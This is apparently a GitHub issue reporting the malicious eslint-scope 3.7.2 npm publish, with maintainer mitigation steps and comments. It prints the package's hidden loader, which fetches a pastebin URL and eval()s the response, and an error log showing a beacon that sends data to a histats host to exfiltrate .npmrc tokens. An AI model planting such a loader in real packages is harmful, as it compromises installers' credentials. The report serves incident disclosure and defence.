Virus in eslint-scope?
Updated blog post: https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes
Update from the maintainers
Incident status report from npm
Please follow the comment by @platinumazure that gives a little insight into what happened: https://github.com/eslint/eslint-scope/issues/39#issuecomment-404533026
It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See https://github.com/eslint/eslint/issues/10600 for more information.
In the meantime

- Pin the version of `eslint-scope` to `3.7.1`. One way is to add `resolutions` to your `package.json`:

```json
"resolutions": {
  "eslint-scope": "3.7.1"
}
```

  Verify the dependency version with `yarn list eslint-scope`. It should print out `eslint-scope@3.7.1`.
- Use `package-lock.json` or `yarn.lock` and have it in your repo if possible. Do not upgrade to 3.7.2 even if `yarn outdated` shows that there is a new version available.
- Revoke your NPM token as suggested in the comment below https://github.com/eslint/eslint-scope/issues/39#issuecomment-404496856. You can do the same by logging in to https://www.npmjs.com/, selecting the “tokens” menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.
The issue
I don’t know what the hell this is but it looks like a virus to me:
```
[2/3] ⠠ eslint-scope
error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
Exit code: 1
Command: node ./lib/build.js
Arguments:
Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope
Output:
undefined:30
https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+conten
                                                                                                                    ^^^^^^

SyntaxError: Unexpected end of input
    at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
    at emitOne (events.js:116:13)
    at IncomingMessage.emit (events.js:211:7)
    at IncomingMessage.Readable.read (_stream_readable.js:475:10)
    at flow (_stream_readable.js:846:34)
    at resume_ (_stream_readable.js:828:3)
    at _combinedTickCallback (internal/process/next_tick.js:138:11)
```
The contents of a suspicious file:
```js
try {
  var https = require('https');
  // Fetches a remote paste with a browser-like User-Agent ...
  https.get({ 'hostname': 'pastebin.com', path: '/raw/XLeVP82h', headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0', Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } }, (r) => {
    r.setEncoding('utf8');
    r.on('data', (c) => {
      // ... and executes whatever it receives, chunk by chunk, as code.
      eval(c);
    });
    r.on('error', () => {});
  }).on('error', () => {});
} catch (e) {}
```
The URL it attempts to load is http://pastebin.com/raw/XLeVP82h. Also it attempts to send my `.npmrc` somewhere.
This is version 3.7.2 that’s been published an hour ago.
Issue Analytics
- Created 5 years ago
- Reactions: 380
- Comments: 92 (19 by maintainers)
Top GitHub Comments
Once things settle a bit, I’d love to see the eslint team and/or npm support publish a post-mortem discussing exactly what happened and recommendations to prevent this from occurring for other npm package authors in the future.
@DylanLukes You should not be using joke software like npm then.